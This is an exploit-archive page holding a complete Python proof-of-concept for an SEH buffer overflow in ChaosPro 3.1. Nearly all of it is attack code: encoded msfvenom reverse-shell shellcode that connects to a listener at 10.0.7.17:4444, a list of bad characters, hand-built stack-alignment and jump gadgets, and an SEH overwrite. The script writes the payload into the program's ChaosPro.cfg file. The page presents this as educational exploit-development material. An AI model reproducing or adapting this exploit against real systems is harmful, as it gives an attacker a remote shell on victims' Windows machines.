Chaospro 3.1 seh buffer overflow Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-09-02 | Type : local | Platform : windows
This exploit / vulnerability Chaospro 3.1 seh buffer overflow is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!C:\Python27\python.exe

# Title : ChaosPro 3.1
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html

# our egg!
payload = "T00WT00W"

# adjust the stack from 00F2FFA6 to 00F2FFA8
payload += "\x83\xC4\x02"

#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)

#badchars
#\x0a\x1a\x3b\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a
#\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9
#\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8
#\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7
#\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6
#\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5
#\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4
#\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

# stack alignment
pop_esp = "\x5c"
pop_eax = "\x58"
push_eax = "\x50"
push_esp = "\x54"
align_stack = "\x2d\x8f\x8e\x8d\x8c\x2d\x7e\x68\x71\x72\x2d\x01\x01\x01\x01"
zero_eax = "\x25\x7e\x7e\x05\x7e\x25\x01\x01\x7a\x01"

#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"

#line containing our payload
line_start = "Username "
line_start += payload + "\n"

#line with our overflow
line_start += "ProjectPath "
junk = line_start

#the buffer starts being overwritten with
# our controlled values at 522
junk += "A" * 522

#junk += alpha_numeric_hex
junk += "A" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))
#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)

# baby nopsled
junk += "A" * 9

# ok, lets start working stuff here ... we have 126 bytesish ...
junk += zero_eax
junk += push_esp + pop_eax # push esp, pop eax
junk += align_stack
junk += push_eax
junk += pop_esp

# first section into the stack
# e7 ff e4 75
# good
junk += zero_eax
junk += "\x2d\x89\x88\x87\x86"
junk += "\x2d\x01\x8f\x77\x8f"
junk += "\x2d\x01\x04\x01\x02"
junk += push_eax

# second section into the stack
# af e7 75 af
# good
junk += zero_eax
junk += "\x2d\x4f\x4e\x4d\x4c"
junk += "\x2d\x01\x39\x8f\x02"
junk += "\x2d\x01\x03\x3c\x01"
junk += push_eax

# third section into the stack
# d7 89 57 30
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x74\x73"
junk += "\x2d\x3e\x19\x01\x8f"
junk += "\x2d\x03\x01\x01\x26"
junk += push_eax

# size for section one
junk += "A" * (
126
- 9 # nopsled

# aligning the stack
- len(zero_eax)
- len(push_esp)
- len(pop_eax)
- len(align_stack)
- len(push_eax)
- len(pop_esp)

# first set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# second set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# third set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)
)

# baby nopslep just for breathing room
junk += "AAAA"
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#Section Two

# baby nopsled
junk += "AAA"

# fourth section into the stack part two
# 30 54 b8 ec
# fourth section into the stack part one
junk += zero_eax
junk += "\x2d\x80\x15\x75\x75"
junk += "\x2d\x80\x20\x32\x35"
junk += "\x2d\x14\x11\x04\x25"
junk += push_eax

# fifth section into the stack
# 74 5a 05 3c
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x89"
junk += "\x2d\x34\x6b\x17\x01"
junk += "\x2d\x01\x01\x01\x01"
junk += push_eax

# sixth section into the stack
# 2e cd 58 53
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x1d\x18\x8e\x43"
junk += "\x2d\x01\x01\x17\x01"
junk += push_eax

# seventh section into the stack
# 43 43 db 31
# good
junk += zero_eax
junk += "\x2d\x8f\x8e\x8d\x8c"
junk += "\x2d\x3e\x7f\x2d\x2d"
junk += "\x2d\x02\x17\x01\x03"
junk += push_eax

junk += "A" * (
126 # amount of room before we need to jump

- 3 # baby nopsled

# part one of fourth set of bytes going onto the stack
- len(zero_eax)

# part two of fourth sec of bytes going onto the stack
- 15
- len(push_eax)

# fifth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# sixth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

# seventh set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- 4 # baby nopsled
- len(jmpback80)
)

# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

# baby nopsled
junk += "AAAA"

# eighth section into the stack part two
# 52 42 0f ff
# good
# eighth section into the stack part one
junk += zero_eax
junk += "\x2d\x65\x65\x75\x75"
junk += "\x2d\x65\x65\x25\x25"
junk += "\x2d\x37\x25\x23\x13"
junk += push_eax

# ninth section into the stack
# ca 81 66 43
# good
junk += zero_eax
junk += "\x2d\x8f\x81\x7c\x7b"
junk += "\x2d\x2d\x17\x01\x8f"
junk += "\x2d\x01\x01\x01\x2b"
junk += push_eax

junk += "A" * (
126 # amount of room before we need to jump

- len(jmpback80)

- 4 # baby nopsled

# eighth set of bytes going onto the stack
# eighth section
- len(zero_eax)
- 15
- len(push_eax)

# ninth set of bytes going onto the stack
- len(zero_eax)
- 15
- len(push_eax)

- len(jmpforward06)
)

# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80

#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x5d\x10\x40"

# write the evil file
with open('C:\\Program Files\\ChaosPro3.1\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)